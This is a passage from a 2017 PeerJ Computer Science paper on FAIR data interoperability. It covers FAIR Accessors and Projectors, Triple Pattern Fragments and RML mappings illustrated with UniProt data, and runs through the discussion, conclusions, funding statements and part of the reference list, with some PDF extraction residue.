will be returned from such a request? In this interoperability infrastructure, we propose that Projectors should be considered as DCAT Distributions, and thus TPF URLs, with appropriate parameters bound, are included in the distribution section of the MetaRecord metadata. An example is shown in Fig. 7, again rendered using Tabulator. Note that there are now four distributions—two of them are the html and rdf distributions discussed above (Fig. 5). The two new distributions are those provided by a FAIR Projector. Again, looking at an abbreviated and simplified Turtle document for clarity (Fig. 8) we can see the metadata structure of one of these two new distributions. Following the Triple Pattern Fragments behaviour, requesting the downloadURL with HTTP GET will trigger the Projector to restrict its output to only those data from UniProt where the subject is UniProt record C8V1L6, and the property of interest is ‘‘classifiedWith’’ from the UniProt Core ontology. The triples returned in response to this call, however, will not match the native semantics of UniProt, but rather will match the semantics and structure defined in the RML Mappings block. The schematic structure of this Mapping RML is diagrammed in Fig. 2. The Mappings describes a Triple where the subject will be of type edam:data_0896 (‘‘Protein record’’), the predicate will be ‘‘classifiedWith’’ from the UniProt Core ontology, and the object will be of type edam:data_1176 (‘‘GO Concept ID’’). Specifically, the triples returned are: @prefix uni: . @prefix obo: . uni:C8V1L6 core:classifiedWith obo:GO_0000245, obo:GO_0045292 . Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 22/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 This is accompanied by a block of hypermedia controls (not shown) using the Hydra vocabulary (Lanthaler & Gütl, 2013; Das, Sundara & Cyganiak, 2012) that provide machine- readable instructions for how to navigate the remainder of that dataset—for example, how to get the entire row, or the entire column for the current data-point. Though the subject and object are not explicitly typed in the output from this call to the Projector, further exploration of the Projector’s output, via those TPF’s hypermedia controls, would reveal that the Subject and Object are in fact typed according to the EDAM ontology, as declared in the RML Mapping. Thus, this FAIR Projector served data transformed from UniProt Core semantic types, to the equivalent data represented within the EDAM semantic framework, as shown in Fig. 9. Also note that the URI structure for the UniProt entity has been changed from the UniProt URI scheme to a URI following the Identifiers.org scheme. The FAIR Projector, in this case, is a script that dynamically transforms data from a query of UniProt into the appropriately formatted triples; however, this is opaque to the client. The Projector’s TPF interface, from the perspective of the client, would be identical if the Projector was serving pre-transformed data from a static document, or even generating novel data from an analytical service. Thus, FAIR Projectors harmonize the interface to retrieving RDF data in a desired semantic/structure, regardless of the underlying mechanism for generating that data. This example was chosen for a number of reasons. First, to contrast with the static Zenodo example provided earlier, where this Accessor/Projector combination are querying the UniProt database dynamically. In addition, because we wished to demonstrate the utility of the Projector’s ability to transform the semantic framework of existing FAIR data in a discoverable way. For example, in UniProt, Gene Ontology terms do not have a richer semantic classification than ‘‘owl:Class’’. With respect to interoperability, this is problematic, as the lack of rich semantic typing prevents them from being used for automated discovery of resources that could potentially consume them, or use them for integrative, cross-domain queries. This FAIR Accessor/Projector advertises that it is possible to obtain EDAM-classified data, from UniProt, simply by resolving the Projector URL. DISCUSSION Interoperability is hard. It was immediately evident that, of the four FAIR principles, Interoperability was going to be the most challenging. Here we have designed a novel infrastructure with the primary objective of interoperability for both metadata and data, but with an eye to all four of the FAIR Principles. We wished to provide discoverable and interoperable access to a wide range of underlying data sources—even those in computationally opaque formats—as well as supporting a wide array of both academic and commercial end-user applications above these data sources. In addition, we imposed constraints on our selection of technologies; in particular, that the implementation should re-use existing technologies as much as possible, and should support multiple and unpredictable end-uses. Moreover, it was accepted from the outset that the trade-off between simplicity and power was one that could not be avoided, since a key objective was Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 23/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 to maximize uptake over the broadest range of data repositories, spanning all domains— this would be nearly impossible to achieve through, for example, attempting to impose a ‘universal’ API or novel query language. Thus, with the goal of maximizing global uptake and adoption of this interoperability infrastructure, and democratizing the cost of implementation over the entire stakeholder community—both users and providers—we opted for lightweight, weakly integrative, REST solutions, that nevertheless lend themselves to significant degrees of mechanization in both discovery and integration. We now look more closely at how this interoperability infrastructure meets the expectations within the FAIR Principles. FAIR facet(s) addressed by the Container Resource: • Findable—The container has a distinct globally unique and resolvable identifier, allowing it to be discovered and explicitly, unambiguously cited. This is important because, in many cases, the dataset being described does not natively possess an identifier, as in our example above where the dataset represented the results of a query. In addition, the container’s metadata describes the research object, allowing humans and machines to evaluate the potential utility of that object for their task. • Accessible—the Container URL resolves to a metadata record using standard HTTP GET. In addition to describing the nature of the research object, the metadata record should include information regarding licensing, access restrictions, and/or the access protocol for the research object. Importantly, the container metadata exists independently of the research object it describes, where FAIR Accessibility requires metadata to be persistently available even if the data itself is not. • Interoperable—The metadata is provided in RDF—a globally-applicable syntax for data and knowledge sharing. In addition, the metadata uses shared, widely-adopted public ontologies and vocabularies to facilitate interoperability at the metadata level. • Reusable—the metadata includes citation information related to the authorship of the container and/or its contents, and license information related to the reuse of the data, by whom, and for what purpose. Other features of the Container Resource • Privacy protection—The container metadata provides access to a rich description of the content of a resource, without exposing any data within that resource. While a provider may choose to include MetaRecord URLs within this container, they are not required to do so if, for example, the data is highly sensitive, or no longer easily accessible; however, the contact information provided within the container allows potential users of that data to inquire as to the possibility of gaining access in some other way. As such, this container facilitates a high degree of FAIRness, while still providing a high degree of privacy protection. FAIR Facet(s) Addressed by the MetaRecord: • Findable—The MetaRecord URL is a globally-unique and resolvable identifier for a data entity, regardless of whether or not it natively possesses an identifier. The Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 24/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 metadata it resolves to allows both humans and machines to interrogate the nature of a data element before deciding to access it. • Accessible—the metadata provided by accessing the MetaRecord URL describes the accessibility protocol and license information for that record, and describes all available formats. • Interoperable—as with the Container metadata, the use of shared ontologies and RDF ensures that the metadata is interoperable. • Reusable—the MetaRecord metadata should carry record-level citation information to ensure proper attribution if the data is used. We further propose, but do not demonstrate, that authorship of the MetaRecord itself could be carried in a second named-graph, in a manner similar to that proposed by the NanoPublication specification. Other features of the MetaRecord • Privacy protection—the MetaRecord provides for rich descriptive information about a specific member of a collection, where the granularity of that description is entirely under the control of the data owner. As such, the MetaRecord can provide a high degree of FAIRness at the level of an individual record, without necessarily exposing any identifiable information. In addition, the provider may choose to stop at this level of FAIRness, and not include further URLs giving access to the data itself. • Symmetry of traversal—Since we predict that clients will, in the future, query over indexes of FAIR metadata searching for dataset or records of interest, it is not possible to predict the position at which a client or their agent will enter your FAIR Accessor. While the container metadata provides links to individual MetaRecords, the MetaRecord similarly provides a reference back ‘‘upwards’’ to its container. Thus a client can access repository-level metadata (e.g., curation policy, ownership, linking policy) for any given data element it discovers. This became particularly relevant as a result of the European Court of Justice decision (Court of Justice of the European Union, 2016) that puts the burden of proof on those who create hyperlinks to ensure the document they link to is not, itself, in violation of copyright. • High granularity of access control—individual elements of a collection may have distinct access constraints or licenses. For example, individual patients within a study may have provided different consent. MetaRecords allow each element within a collection to possess, and publish, its own access policy, access protocol, license, and/or usage-constraints, thus providing fine-grained control of the access/use of individual elements within a repository. FAIR Facet(s) Addressed by the Triple Descriptors and FAIR Projectors: • Findable—Triple Descriptors, in isolation or when aggregated into FAIR Profiles, provide one or more semantic interpretations of data elements. By indexing these descriptors, it would become possible to search over datasets for those that contain data-types of interest. Moreover, FAIR Projectors, as a result of the TPF URI structure, create a unique URL for every data-point within a record. This has striking Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 25/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 consequences with respect to scholarly communication. For example, it becomes possible to unambiguously refer-to, and therefore ‘‘discuss’’ and/or annotate, individual spreadsheet cells from any data repository. • Accessible—Using the TPF design patterns, all data retrieval is accomplished in exactly the same way—via HTTP GET. The response includes machine-readable instructions that guide further exploration of the data without the need to define an API. FAIR Projectors also give the data owner high granularity access control; rather than publishing their entire dataset, they can select to publish only certain components of that dataset, and/or can put different access controls on different data elements, for example, down to the level of an individual spreadsheet cell. • Interoperable—FAIR Projectors provide a standardized way to export any type of underlying data in a machine-readable structure, using widely used, public shared vocabularies. Data linkages that were initially implicit in the datastore, identifiers for example, become explicit when converted into URIs, resulting in qualified linkages between formerly opaque data deposits. Similarly, data that resides within computationally opaque structures or formats can also be exposed, and published in a FAIR manner if there is an algorithm capable of extracting it and exposing it via the TPF interface. • Reusable—All data points now possess unique identifiers, which allows them to be explicitly connected to their citation and license information (i.e., the MetaRecord). In this way, every data point, even when encountered in isolation, provides a path to trace-back to its reusability metadata. Other features of FAIR Projection • Native formats are preserved—As in many research domains, bioinformatics has created a large number of data/file formats. Many of these, especially those that hold ‘‘big data’’, are specially formatted flat-files that focus on size-efficient representation of data, at the expense of general machine-accessibility. The analytical tooling that exists in this domain is capable of consuming these various formats. While the FAIR Data community has never advocated for wholesale Interoperable representations of these kinds of data—which would be inefficient, wasteful, and lacking in utility—the FAIR Projector provides a middle-ground. Projection allows software to query the core content of a file in a repository prior to downloading it; for example, to determine if it contains data about an entity or identifier of interest. FAIR Projectors, therefore, enable efficient discovery of data of-interest, without requiring wasteful transformation of all data content into a FAIR format. • Semantic conversion of existing Triplestores—It is customary to re-cast the semantic types of entities within triplestores using customized SPARQL BIND or CONSTRUCT clauses. FAIR Projectors provide a standardized, SPARQL-free, and discoverable way to accomplish the same task. This further harmonizes data, and simplifies interoperability. • Standardized interface to (some) Web APIs—Many Web APIs in the biomedical domain have a single input parameter, generally representing an identifier for Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 26/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 some biochemical entity. FAIR Projectors can easily replace these myriad Web APIs with a common TPF interface, thus dramatically enhancing discoverability, machine-readability, and interoperability between these currently widely disparate services. Incentives and barriers to implementation Looking forward, there is every indication that FAIRness will soon be a requirement of funding agencies and/or journals. As such, infrastructures such as the one described in this exemplar will almost certainly become a natural part of scholarly data publishing in the future. Though the FAIR infrastructure proposed here may appear difficult to achieve, we argue that a large portion of these behaviours—for example, the first two layers of the Accessor—can be accomplished using simple fill-in-the-blank templates. Such templating tools are, in fact, already being created by several of the co-authors, and will be tested on the biomedical data publishing community in the near future to ensure they are clear and usable by this key target-audience. Projection, however, is clearly a complex undertaking, and one that is unlikely to be accomplished by non-informaticians on their own. Transformation from unstructured or semi-structured formats into interoperable formats cannot be fully automated, and we do not claim to have fully solved the interoperability bottleneck. We do, however, claim to have created an infrastructure that improves on the status quo in two ways: first, we propose to replace the wasteful, one-off, ‘‘reuseless’’ data transformation activities currently undertaken on a daily basis throughout the biomedical community (and beyond), with a common, reusable, and machine-readable approach, by suggesting that all data transformations should be described in RML and transformed data exposed using TPF. Second, the solution we propose may, in many cases, partially automate the data transformation process itself. RML can be used, in combination with generic software such as RML Processor (http://github.com/RMLio) to actuate a data transformation over many common file formats such as CSV or XML. As such, by focusing on building RML models, in lieu of reuseless data transformation scripts, data publishers achieve both the desired data transformation, as well as a machine-readable interface that provides that transformed data to all other users. This may be incentivized even more by creating repositories of RML models that can be reused by those needing to do data transformations. Though the infrastructure for capturing these user-driven transformation events and formalizing them into FAIR Projectors does not yet exist, it does not appear on its surface to be a complex problem. Thus, we expect that such infrastructure should appear soon after FAIRness becomes a scholarly publishing requirement, and early prototypes of these infrastructures are being built by our co-authors. Several communities of data providers are already planning to use this, or related FAIR implementations, to assist their communities to find, access, and reuse their valuable data holdings. For example, the Biobanking and Rare disease communities will be given end-user tools that utilize/generate such FAIR infrastructures to: guide discovery by researchers; help both biobankers and researchers to re-code their data to standard ontologies building on the SORTA system (Pang et al., 2015); assist to extend the MOLGENIS/BiobankConnect system Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 27/34 https://peerj.com http://github.com/RMLio http://dx.doi.org/10.7717/peerj-cs.110 (Pang et al., 2016); add FAIR interfaces to the BBMRI (Biobanking and BioMolecular resources Research Infrastructure) and RD-connect national and European biobank data and sample catalogues. There are also a core group of FAIR infrastructure authors who are creating large-scale indexing and discovery systems that will facilitate the automated identification and retrieval of relevant information, from any repository, in response to end-user queries, portending a day when currently unused—‘‘lost’’—data deposits once again provide return-on-investment through their discovery and reuse. CONCLUSIONS There is a growing movement of governing bodies and funding organizations towards a requirement for open data publishing, following the FAIR Principles. It is, therefore, useful to have an exemplar ‘‘reference implementation’’ that demonstrates the kinds of behaviours that are expected from FAIR resources. Of the four FAIR Principles, Interoperability is arguably the most difficult FAIR facet to achieve, and has been the topic of decades of informatics research. Several new standards and frameworks have appeared in recent months that addressed various aspects of the Interoperability problem. Here, we apply these in a novel combination, and show that the result is capable of providing interoperability between formerly incompatible data formats published anywhere on the Web. In addition, we note that the other three aspects of FAIR—Findability, Accessibility, and Reusability—are easily addressed by the resulting infrastructure. The outcome, therefore, provides machine-discoverable access to richly described data resources in any format, in any repository, with the possibility of interoperability of the contained data down to the level of an individual ‘‘cell’’. No new standards or APIs were required; rather, we rely on REST behaviour, with all entities being resources with a resolvable identifier that allow hypermedia-driven ‘‘drill-down’’ from the level of a repository descriptor, all the way to an individual data point in the record. Such an interoperability layer may be created and published by anyone, for any data source, without necessitating an interaction with the data owner. Moreover, the majority of the interoperability layer we describe may be achieved through dynamically generated files from software, or even (for the Accessor portion) through static, manually-edited files deposited in any public repository. As such, knowledge of how to build or deploy Web infrastructure is not required to achieve a large portion of these FAIR behaviours. The trade-off between power and simplicity was considered acceptable, as a means to hopefully encourage wide adoption. The modularity of the solution was also important because, in a manner akin to crowdsourcing, we anticipate that the implementation will spread through the community on a needs-driven basis, with the most critical resource components being targeted early—the result of individual researchers requiring interoperable access to datasets/subsets of interest to them. The interoperability design patterns presented here provide a structured way for these individuals to contribute and share their individual effort—effort they would have invested anyway—in a collaborative manner, piece-by-piece building a much larger interoperable and FAIR data infrastructure to benefit the global community. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 28/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 ACKNOWLEDGEMENTS In January 2014 the Lorentz Center hosted the ‘Jointly Designing a Data FAIRport’ workshop. This workshop was organized by Barend Mons in collaboration with and co-sponsored by the Lorentz center, The Dutch Techcentre for Life Sciences/ELIXIR-NL and the Netherlands eScience Center. The workshop led to the formalization of FAIR principles and subsequently to the formation of a FAIR Skunkworks team and a FAIR Data engineering team. We thank Barend Mons for critical discussions leading up to this article. We would also like to thank the UniProt RDF and SPARQL team at the Swiss-Prot group of the SIB Swiss Institute of Bioinformatics for their advice and assistance. We would like to acknowledge the advice and feedback from the leaders and participants of BioHackathon 2016, hosted by the Integrated Database Project (Ministry of Education, Culture, Sports Science and Technology, Japan), the National Bioscience Database Center (NBDC—Japan), and the Database Center for Life Sciences (DBCLS—Japan). ADDITIONAL INFORMATION AND DECLARATIONS Funding The lead author is supported by the Fundacion BBVA + UPM Isaac Peral programme, and the Spanish Ministerio de Economía y Competitividad grant number TIN2014-55993- R. Additional support for FAIR Skunkworks members comes from European Union funded projects ELIXIR-EXCELERATE (H2020 no. 676559), ADOPT BBMRI-ERIC (H2020 no. 676550) and CORBEL (H2020 no. 654248). Portions of this work have been funded by Netherlands Organisation for Scientific Research (Odex4all project), Stichting Topconsortium voor Kennis en Innovatie High Tech Systemen en Materialen (FAIRdICT project), BBMRI-NL, RD-Connect and ELIXIR (Rare disease implementation study FP7 no. 305444). UniProt is mainly supported by the National Institutes of Health (NIH), National Human Genome Research Institute (NHGRI) and National Institute of General Medical Sciences (NIGMS) grant U41HG007822. Swiss-Prot activities at the SIB are supported by the Swiss Federal Government through the State Secretariat for Education, Research and Innovation SERI. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Fundacion BBVA + UPM Isaac Peral programme. Spanish Ministerio de Economía y Competitividad: TIN2014-55993-R. European Union funded projects ELIXIR-EXCELERATE: H2020 no. 676559. ADOPT BBMRI-ERIC: H2020 no. 676550. CORBEL: H2020 no. 654248. Netherlands Organisation for Scientific Research. FAIRdICT project. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 29/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 National Institutes of Health (NIH). National Human Genome Research Institute (NHGRI). National Institute of General Medical Sciences (NIGMS): U41HG007822. Swiss Federal Government. Competing Interests The authors declare there are no competing interests. Author Contributions • Mark D. Wilkinson conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Ruben Verborgh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • Luiz Olavo Bonino da Silva Santos, Fleur D.L. Kelpin, Arnold Kuzniar and Anand Gavai conceived and designed the experiments, analyzed the data, reviewed drafts of the paper. • Tim Clark, Alasdair J.G. Gray, Erik M. van Mulligen and Paolo Ciccarese conceived and designed the experiments, reviewed drafts of the paper. • Morris A. Swertz, Erik A. Schultes, Mark Thompson and Rajaram Kaliyaperumal conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • Jerven T. Bolleman analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper, fixed the demonstrative query, clarified the semantics of UniProt, corrected erroneous ontological annotations;. • Michel Dumontier conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The manuscript describes a set of practices and behaviors that combine third-party technologies and standards in a novel manner. This does not (necessarily) require novel, dedicated software, and therefore a repository is not provided. The paper uses only public data for its demonstration, and the query to retrieve that data from-source is provided in the manuscript text (the curator of that data is UniProt, the data is being used/republished with their explicit permission, and a member of their team is a co-author on the manuscript). REFERENCES Bechhofer S, Buchan I, De Roure D, Missier P, Ainsworth J, Bhagat J, Couch P, Cruick- shank D, Delderfield M, Dunlop I, Gamble M, Michaelides D, Owen S, Newman D, Sufi S, Goble C. 2013. Why linked data is not enough for scientists. Future Generations Computer Systems: FGCS 29:599–611 DOI 10.1016/j.future.2011.08.004. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 30/34 https://peerj.com http://dx.doi.org/10.1016/j.future.2011.08.004 http://dx.doi.org/10.7717/peerj-cs.110 Berners-Lee T. 2006. Linked data. Available at https://www.w3.org/DesignIssues/ LinkedData.html (accessed on 27 September 2016). Berners-Lee T, Chen Y, Chilton L, Connolly D, Dhanaraj R, Hollenbach J, Lerer A, Sheets D. 2006. Tabulator: exploring and analyzing linked data on the semantic web. In: Proceedings of the 3rd international semantic web user interaction workshop. Ciccarese P, Soiland-Reyes S, Belhajjame K, Gray AJ, Goble C, Clark T. 2013. PAV ontology: provenance, authoring and versioning. Journal of Biomedical Semantics 4:37 DOI 10.1186/2041-1480-4-37. Cook CE, Bergman MT, Finn RD, Cochrane G, Birney E, Apweiler R. 2016. The European bioinformatics institute in 2016: data growth and integration. Nucleic Acids Research 44:D20–D26 DOI 10.1093/nar/gkv1352. Court of Justice of the European Union. 2016. PRESS RELEASE No 92/16. Available at http://curia.europa.eu/jcms/upload/docs/application/pdf/2016-09/cp160092en.pdf (accessed on 21 December 2016). Covitz PA, Hartel F, Schaefer C, Coronado S, Fragoso G, Sahni H, Gustafson S, Buetow KH. 2003. caCORE: a common infrastructure for cancer informatics. Bioinformatics 19:2404–2412 DOI 10.1093/bioinformatics/btg335. Crosswell LC, Thornton JM. 2012. ELIXIR: a distributed infrastructure for European bi- ological data. Trends in Biotechnology 30:241–242 DOI 10.1016/j.tibtech.2012.02.002. Das S, Sundara S, Cyganiak R. 2012. R2RML: RDB to RDF mapping language. W3C Recommendation. Available at https://www.w3.org/TR/r2rml/ . De Giovanni R, Copp C, Döring M, Hobern D. 2010. TAPIR—TDWG access protocol for information retrieval. TSWG Standards. Available at http://www.tdwg.org/ standards/449. Dimou A, Vander Sande M, Colpaert P, Verborgh R, Mannens E, Van de Walle R. 2014. RML: a generic language for integrated rdf mappings of heterogeneous data. In: Proceedings of the 7th workshop on linked data on the web, vol. 1184, CEUR workshop proceedings. Dumontier M, Gray AJG, Marshall MS, Alexiev V, Ansell P, Bader G, Baran J, Bolleman JT, Callahan A, Cruz-Toledo J, Gaudet P, Gombocz EA, Gonzalez-Beltran AN, Groth P, Haendel M, Ito M, Jupp S, Juty N, Katayama T, Kobayashi N, Krish- naswami K, Laibe C, Novère N, Lin S, Malone J, Miller M, Mungall CJ, Rietveld L, Wimalaratne SM, Yamaguchi A. 2016. The health care and life sciences community profile for dataset descriptions. PeerJ 4:e2331 DOI 10.7717/peerj.2331. Fallside DC, Walmsley P. 2004. XML Schema part 0—primer second edition. Available at https://www.w3.org/TR/xmlschema-0/ (accessed on 20 December 2016). Fielding RT, Taylor RN. 2002. Principled design of the modern Web architecture. ACM Transactions on Internet Technology 2:115–150 DOI 10.1145/514183.514185. Gessler DDG, Schiltz GS, May GD, Avraham S, Town CD, Grant D, Nelson RT. 2009. SSWAP: a simple semantic web architecture and protocol for semantic web services. BMC Bioinformatics 10:309 DOI 10.1186/1471-2105-10-309. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 31/34 https://peerj.com https://www.w3.org/DesignIssues/LinkedData.html https://www.w3.org/DesignIssues/LinkedData.html http://dx.doi.org/10.1186/2041-1480-4-37 http://dx.doi.org/10.1093/nar/gkv1352 http://curia.europa.eu/jcms/upload/docs/application/pdf/2016-09/cp160092en.pdf http://dx.doi.org/10.1093/bioinformatics/btg335 http://dx.doi.org/10.1016/j.tibtech.2012.02.002 https://www.w3.org/TR/r2rml/ http://www.tdwg.org/standards/449 http://www.tdwg.org/standards/449 http://dx.doi.org/10.7717/peerj.2331 https://www.w3.org/TR/xmlschema-0/ http://dx.doi.org/10.1145/514183.514185 http://dx.doi.org/10.1186/1471-2105-10-309 http://dx.doi.org/10.7717/peerj-cs.110 González AR, Callahan A, Cruz-Toledo J, Garcia A, Aranguren M, Dumontier M, Wilkinson MD. 2014. Automatically exposing OpenLifeData via SADI semantic web services. Journal of Biomedical Semantics 5:46 DOI 10.1186/2041-1480-5-46. Gray AJG, Baran J, Marshall MS, Dumontier M. 2015. Dataset descriptions: HCLS community profile. Interest group note, W3C (May 2015). Available at http://www. w3 org/TR/hcls-dataset. Heery R, Patel M. 2000. Application profiles: mixing and matching metadata schemas. Ariadne Issue 25. September 24, 2000. Available at http://www.ariadne.ac.uk/issue25/ app-profiles/ . Ison J, Kalas M, Jonassen I, Bolser D, Uludag M, McWilliam H, Malone J, Lopez R, Pettifer S, Rice P. 2013. EDAM: an ontology of bioinformatics operations, types of data and identifiers, topics and formats. Bioinformatics 29:1325–1332 DOI 10.1093/bioinformatics/btt113. Kuhn T, Tobias K, Christine C, Michael K, Núria Q-R, Ruben V, George G, Ngomo A- CN, Raffaele V, Michel D. 2016. Decentralized provenance-aware publishing with nanopublications. PeerJ Computer Science 2:e78 DOI 10.7717/peerj-cs.78. Lanthaler M, Gütl C. 2013. Hydra: a vocabulary for hypermedia-driven web APIs. In: Proceedings of the 6th workshop on linked data on the web (LDOW2013), May 14, 2013, Rio de Janeiro, Brazil. Available at http://ceur-ws.org/Vol-996/papers/ ldow2013-paper-03.pdf . Maali F, Erickson J, Archer P. 2014. Data catalog vocabulary (DCAT). W3C Recom- mendation. Available at https://www.w3.org/TR/vocab-dcat/ . Martin D, Paolucci M, McIlraith S, Burstein M, McDermott D, McGuinness D, Parsia B, Payne T, Sabou M, Solanki M, Srinivasan N, Sycara K. 2005. Bringing semantics to web services: the OWL-S approach. In: Semantic web services and web process composition: first international workshop, SWSWPC 2004, San Diego, CA, USA, July 6, 2004, Revised Selected Papers. Springer Berlin Heidelberg, 26–42. Martin D, Paolucci M, Wagner M. 2007. Towards semantic annotations of web services: OWL-S from the SAWSDL perspective. In: Proceedings of the OWL-S experiences and future developments workshop at ESWC. Available at https://static.aminer.org/pdf/ PDF/000/371/077/grounding_owl_s_in_wsdl_s.pdf . Miles A, Bechhofer S. 2009. SKOS simple knowledge organization system reference. W3C Recommendation. Available at https://www.w3.org/TR/skos-reference/ . Pang C, Van Enckevort D, De Haan M, Kelpin F, Jetten J, Hendriksen D, De Boer T, Charbon B, Winder E, Van der Velde KJ, Doiron D, Fortier I, Hillege H, Swertz MA. 2016. MOLGENIS/connect: a system for semi-automatic integration of heterogeneous phenotype data with applications in biobanks. Bioinformatics 32:2176–2183 DOI 10.1093/bioinformatics/btw155. Pang C, Sollie A, Sijtsma A, Hendriksen D, Charbon B, De Haan M, De Boer T, Kelpin F, Jetten J, Van der Velde JK, Smidt N, Sijmons R, Hillege H, Swertz MA. 2015. SORTA: a system for ontology-based re-coding and technical annotation of biomedical phenotype data. Database 2015:bav089 DOI 10.1093/database/bav089. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 32/34 https://peerj.com http://dx.doi.org/10.1186/2041-1480-5-46 http://www.w3 org/TR/hcls-dataset http://www.w3 org/TR/hcls-dataset http://www.ariadne.ac.uk/issue25/app-profiles/ http://www.ariadne.ac.uk/issue25/app-profiles/ http://dx.doi.org/10.1093/bioinformatics/btt113 http://dx.doi.org/10.7717/peerj-cs.78 http://ceur-ws.org/Vol-996/papers/ldow2013-paper-03.pdf http://ceur-ws.org/Vol-996/papers/ldow2013-paper-03.pdf https://www.w3.org/TR/vocab-dcat/ https://static.aminer.org/pdf/PDF/000/371/077/grounding_owl_s_in_wsdl_s.pdf https://static.aminer.org/pdf/PDF/000/371/077/grounding_owl_s_in_wsdl_s.pdf https://www.w3.org/TR/skos-reference/ http://dx.doi.org/10.1093/bioinformatics/btw155 http://dx.doi.org/10.1093/database/bav089 http://dx.doi.org/10.7717/peerj-cs.110 Roche DG, Kruuk LEB, Lanfear R, Binning SA. 2015. Public data archiving in ecology and evolution: how well are we doing? PLOS Biology 13:e1002295 DOI 10.1371/journal.pbio.1002295. Rodriguez Iglesias, Alejandro, Marconi, Marco, Sesma, Ane, Wilkinson, Mark. 2016. RDF representation of RNA metabolism evolution data—version 3 (diagrammed in https://zenodo.org/deposit/47641/) [Data set]. Zenodo. DOI 10.5281/zenodo.161719. SIB Swiss Institute of Bioinformatics Members. 2016. The SIB Swiss Institute of Bioinformatics’ resources: focus on curated databases. Nucleic Acids Research 44:D27–D37 DOI 10.1093/nar/gkv1310. Speicher S, Arwe J, Malhotra A. 2015. Linked data platform 1.0. W3C Recommenda- tion. Available at https://www.w3.org/TR/ldp/ . Starr J, Castro E, Crosas M, Dumontier M, Downs RR, Duerr R, Haak LL, Haendel M, Herman I, Hodson S, Hourclé J, Kratz JE, Lin J, Nielsen LH, Nurnberger A, Proell S, Rauber A, Sacchi S, Smith A, Taylor M, Clark T. 2015. Achieving human and machine accessibility of cited data in scholarly publications. PeerJ Computer Science 1:e1 DOI 10.7717/peerj-cs.1. Stein LD, Knoppers BM, Campbell P, Getz G, Korbel JO. 2015. Data analysis: create a cloud commons. Nature 523:149–151 DOI 10.1038/523149a. Stevens RD, Robinson AJ, Goble CA. 2003. myGrid: personalised bioinformatics on the information grid. Bioinformatics 19(Suppl 1):i302–i304 DOI 10.1093/bioinformatics/btg1041. Thompson R, Johnston L, Taruscio D, Monaco L, Béroud C, Gut IG, Hansson MG, ’t Hoen P-BA, Patrinos GP, Dawkins H, Ensini M, Zatloukal K, Koubi D, Heslop E, Paschall JE, Posada M, Robinson PN, Bushby K, Lochmüller H. 2014. RD- Connect: an integrated platform connecting databases, registries, biobanks and clinical bioinformatics for rare disease research. Journal of General Internal Medicine 29(Suppl 3):S780–S787 DOI 10.1007/s11606-014-2908-8. Van Ommen G-JB, Törnwall O, Bréchot C, Dagher G, Galli J, Hveem K, Landegren U, Luchinat C, Metspalu A, Nilsson C, Solesvik OV, Perola M, Litton J-E, Zatloukal K. 2015. BBMRI-ERIC as a resource for pharmaceutical and life science industries: the development of biobank-based Expert Centres. European Journal of Human Genetics: EJHG 23:893–900 DOI 10.1038/ejhg.2014.235. Verborgh R, Dumontier M. 2016. A web API ecosystem through feature-based reuse. ArXiv preprint. arXiv:1609.07108. Verborgh R, Ruben V, Sande MV, Olaf H, Van Herwegen J, De Vocht L, De Meester B, Gerald H, Pieter C. 2016. Triple pattern fragments: a low-cost knowledge graph interface for the web. Web Semantics: Science, Services and Agents on the World Wide Web 37–38:184–206. W3C. 2014. Data Catalog Vocabulary (DCAT). Available at http://www.w3.org/TR/ vocab-dcat (accessed on 10 December 2016). Wilkinson MD, Dumontier M, Aalbersberg IJJ, Appleton G, Axton M, Baak A, Blomberg N, Boiten J-W, Da Silva Santos LB, Bourne PE, Bouwman J, Brookes AJ, Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 33/34 https://peerj.com http://dx.doi.org/10.1371/journal.pbio.1002295 http://dx.doi.org/10.5281/zenodo.161719 http://dx.doi.org/10.1093/nar/gkv1310 https://www.w3.org/TR/ldp/ http://dx.doi.org/10.7717/peerj-cs.1 http://dx.doi.org/10.1038/523149a http://dx.doi.org/10.1093/bioinformatics/btg1041 http://dx.doi.org/10.1007/s11606-014-2908-8 http://dx.doi.org/10.1038/ejhg.2014.235 http://arXiv.org/abs/1609.07108 http://www.w3.org/TR/vocab-dcat http://www.w3.org/TR/vocab-dcat http://dx.doi.org/10.7717/peerj-cs.110 Clark T, Crosas M, Dillo I, Dumon O, Edmunds S, Evelo CT, Finkers R, Gonzalez- Beltran A, Gray AJG, Groth P, Goble C, Grethe JS, Heringa J, Hoen PAC, Hooft R, Kuhn T, Kok R, Kok J, Lusher SJ, Martone ME, Mons A, Packer AL, Persson B, Rocca-Serra P, Roos M, Schaik R, Sansone S-A, Schultes E, Sengstag T, Slater T, Strawn G, Swertz MA, Thompson M, 